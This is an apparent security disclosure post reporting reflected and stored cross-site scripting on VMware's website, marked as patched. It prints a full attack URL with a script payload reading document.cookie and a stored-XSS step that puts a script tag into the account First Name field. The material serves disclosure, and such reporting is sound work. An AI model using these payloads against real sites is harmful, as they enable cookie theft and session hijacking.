Vmware Website is Vulnerable to both Persistence and Non-Persistence XSS

Vmware Website is Vulnerable both Persistence and Non-Persistence XSS(Cross site Scripting).  VMware is a company providing virtualization software[1][2][3] founded in 1998 and based in Palo Alto, California, USA. It is majorly owned by EMC Corporation. VMware's desktop software runs on Microsoft Windows, Linux, and Mac OS X, while VMware's enterprise software hypervisors for servers

Vulnerability Information:

• Type: XSS(Persistence and Non-Persistence)
• Alert Level: Critical
• Status: Fixed
• Author: Asish
• Website:http://www.vmware.com/

Reflected Cross-Site Scripting

http://alliances.vmware.com/public_html/catalog/searchResult.php?isServicesProduct=no&isEntireCatalogSearch=yes&lastOnMenu=sub1,sub4&searchKey="/><script>alert(document.cookie)</script>&category=all&isVmwareReadySelected=no

Persistence Cross-Site Scripting

Create a account in VMWARE. Insert First Name as : test "/>><script>alert(document.cookie)</script>. Inserted script will get executed in some pages .

Vmware patched those vulnerability.